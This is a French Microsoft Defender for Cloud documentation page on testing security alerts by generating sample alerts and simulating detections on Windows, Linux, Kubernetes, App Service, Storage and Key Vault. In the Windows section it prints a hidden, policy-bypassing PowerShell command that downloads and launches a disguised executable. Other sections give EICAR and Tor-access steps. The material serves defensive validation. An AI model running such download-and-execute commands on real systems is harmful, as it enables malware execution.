Remarque
L’accès à cette page nécessite une autorisation. Vous pouvez essayer de vous connecter ou de modifier des répertoires.
L’accès à cette page nécessite une autorisation. Vous pouvez essayer de modifier des répertoires.
Cet article explique comment vérifier que votre système est configuré pour Microsoft Defender for Cloud alertes afin de pouvoir surveiller et répondre aux menaces.
Que sont les alertes de sécurité ?
Les alertes sont des notifications générées par Defender for Cloud quand il détecte des menaces sur vos ressources. Defender for Cloud classe les alertes par gravité et les liste avec les détails clés. Vous pouvez utiliser ces informations pour enquêter rapidement sur chaque problème. Defender for Cloud propose également des étapes pour vous aider à remédier à une attaque.
Pour plus d’informations, consultez Alertes de sécurité dans Defender pour le cloud et Gestion et résolution des alertes de sécurité.
Prerequisites
Pour recevoir toutes les alertes, vos machines et les espaces de travail Log Analytics connectés doivent se trouver dans le même locataire.
Générer des exemples d’alertes de sécurité
Si vous utilisez la nouvelle expérience d’alertes d’aperçu, vous pouvez créer des alertes d’exemple depuis la page des alertes de sécurité du portail Azure. Pour plus de détails, voir Gérer et répondre aux alertes de sécurité dans Microsoft Defender for Cloud.
Créer des exemples d’alertes
Utilisez des exemples d’alertes pour :
- Évaluer la valeur et les capacités de vos plans Microsoft Defender.
- Validez les configurations que vous avez effectuées pour vos alertes de sécurité, telles que les intégrations SIEM (Security Information and Event Management), l’automatisation des flux de travail et les notifications par e-mail.
Pour créer des exemples d’alertes :
- En tant qu’utilisateur disposant du rôle Collaborateur de l’abonnement, dans la barre d’outils de la page Alertes de sécurité, sélectionnez Exemples d’alertes.
- Sélectionnez l’abonnement.
- Sélectionnez le ou les plans Microsoft Defender appropriés pour lesquels vous voulez voir les alertes.
- Sélectionnez Créer des exemples d’alertes.
Une notification s’affiche pour vous informer que les exemples d’alertes sont créés :
Après quelques minutes, les alertes d’exemple apparaissent sur la page des alertes de sécurité. Les alertes d'exemple apparaissent également partout ailleurs où vous avez configuré pour recevoir vos alertes de sécurité Microsoft Defender for Cloud (SIEM connectés, notifications par email, etc.).
Conseil / Astuce
Les alertes concernent des ressources simulées.
Simuler des alertes sur vos machines virtuelles Azure (Windows)
Avant de commencer, assurez-vous que :
- L’agent Defender for Endpoint est installé sur votre machine via Defender for Servers.
- Microsoft Defender for Endpoint a activé Real-Time protection. Pour vérifier ce paramètre, voir Configurer la protection en temps réel dans Microsoft Defender Antivirus.
Sur la machine que vous souhaitez tester, ouvrez une invite de commande élevée et exécutez le script :
Accédez à Démarrer et tapez
cmd.Faites un clic droit sur Invite de commandes, puis sélectionnez Exécuter en tant qu’administrateur.
À l’invite, copiez et exécutez la commande suivante :
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'.La fenêtre Invite de commandes se ferme automatiquement. Si la commande aboutit, une nouvelle alerte doit apparaître dans le panneau Alertes de Defender pour le cloud dans un délai de 10 minutes.
La ligne de message dans la zone PowerShell doit se présenter comme ceci :
Sinon, vous pouvez utiliser la chaîne de test EICAR pour simuler l’alerte sur Windows. Créez un fichier texte, collez la ligne EICAR et enregistrez le fichier en tant que fichier exécutable sur le lecteur local de votre ordinateur.
Simuler des alertes sur vos machines virtuelles Azure (Linux)
Avant de commencer, assurez-vous que :
- L’agent Microsoft Defender for Endpoint est installé sur votre machine dans le cadre de l’intégration de Defender for Servers.
- Microsoft Defender for Endpoint fonctionne avec la protection Real-Time activée. Pour vérifier ce paramètre, consultez Configurer la protection en temps réel dans Microsoft Defender Antivirus.
Sur la machine où vous souhaitez simuler la ressource attaquée, suivez ces étapes :
- Ouvrez une fenêtre de terminal, puis copiez et exécutez la commande suivante :
curl -O https://secure.eicar.org/eicar.com.txt - La fenêtre du Terminal se ferme automatiquement. Si cela aboutit, une nouvelle alerte devrait apparaître dans la lame Defender for Cloud Alerts dans les 10 minutes.
Simuler des alertes sur Kubernetes
Defender for Containers crée des alertes pour vos clusters et nœuds de clusters. Il surveille à la fois le plan de contrôle (serveur API) et la charge de travail du conteneur.
Pour simuler les alertes pour le plan de contrôle Defender for Containers et la charge de travail conteneurisée, utilisez l’outil de simulation d’alertes Kubernetes.
Pour en savoir plus, voir Microsoft Defender for Containers.
Simuler des alertes pour App Service
Vous pouvez simuler des alertes pour les ressources en cours d’exécution sur App Service.
- Créez un site web et attendez 24 heures pour qu’il soit inscrit auprès de Defender for Cloud, ou utilisez un site web existant.
- Une fois le site web créé, accédez-y en utilisant l’URL suivante :
- Une alerte est générée dans un délai d’environ 2 à 4 heures.
Simuler des alertes pour Storage Protection avancée contre les menaces (ATP)
Pour valider la détection des menaces pour Microsoft Defender pour le stockage, procédez comme suit :
Accédez à un compte de stockage pour lequel Azure Defender pour Stockage est activé.
Sélectionnez l’onglet Conteneurs dans la barre latérale.
Accédez à un conteneur existant ou créez-en un.
Chargez un fichier dans ce conteneur. Évitez de charger des fichiers susceptibles de contenir des données sensibles.
Cliquez avec le bouton droit sur le fichier téléchargé, puis sélectionnez Générer une SAS.
Sélectionnez le bouton Générer une URL et un jeton SAS (vous n’avez pas besoin de modifier d’options).
Copiez l’URL SAS générée.
Ouvrez la page de téléchargement du navigateur Tor et installez le navigateur Tor.
Dans le navigateur Tor, accédez à l’URL SAS. Vous devriez maintenant pouvoir voir le fichier qui a été chargé et le télécharger.
Simuler des alertes pour le service d’applications (EICAR)
Pour simuler une alerte EICAR App Services :
- Recherchez le point de terminaison HTTP du site web en accédant au panneau du portail Azure pour le site web App Services ou en utilisant l’entrée DNS personnalisée associée à ce site web. (Le point de terminaison d’URL par défaut du site web Azure App Services a le suffixe
https://XXXXXXX.azurewebsites.net.) Le site web doit être un site web existant et non un site web créé avant la simulation d’alerte. - Recherchez le point de terminaison HTTP du site web en accédant au panneau du portail Azure pour le site web App Services ou en utilisant l’entrée DNS personnalisée associée à ce site web. (Le point de terminaison d’URL par défaut du site web Azure App Services a le suffixe
https://XXXXXXX.azurewebsites.net.) Le site web doit être un site web existant et non un site web créé avant la simulation d’alerte. - Accédez à l’URL du site web et ajoutez le suffixe fixe suivant :
/This_Will_Generate_ASC_Alert. L’URL doit se présenter ainsi :https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. La génération de l’alerte peut prendre un certain temps (environ 1 heure et demie).
Valider la détection des menaces d’Azure Key Vault
Pour valider la détection des menaces dans Azure Key Vault, créez un coffre-fort clé en utilisant le portail Azure, puis suivez ces étapes :
Prerequisites
Étapes de validation
Pour valider la détection des menaces dans Azure Key Vault :
- Après avoir créé le coffre de clés et le secret, accédez à une machine virtuelle disposant d’un accès Internet, puis téléchargez le navigateur TOR.
- Installez le navigateur TOR sur votre machine virtuelle.
- Une fois l’installation terminée, ouvrez votre navigateur habituel, connectez-vous au portail Azure, puis accédez à la page du coffre de clés. Sélectionnez l’URL mise en évidence et copiez l’adresse.
- Ouvrez TOR et collez cette URL (vous devez de nouveau vous authentifier pour accéder au portail Azure).
- Après y avoir accédé, vous pouvez aussi sélectionner l’option Secrets dans le volet gauche.
- Dans le navigateur TOR, déconnectez-vous du portail Azure et fermez le navigateur.
- Après un certain temps, Defender pour Key Vault déclenche une alerte avec des informations détaillées sur cette activité suspecte.
Contenu connexe
En savoir plus sur les alertes et la détection des menaces dans Defender for Cloud :
- Validation de la détection des menaces Azure Key Vault dans Microsoft Defender pour le cloud
- Gestion et réponse aux alertes de sécurité dans Microsoft Defender for Cloud : découvrez comment gérer les alertes et répondre aux incidents de sécurité dans Defender for Cloud.
- Présentation des alertes de sécurité dans Microsoft Defender pour le cloud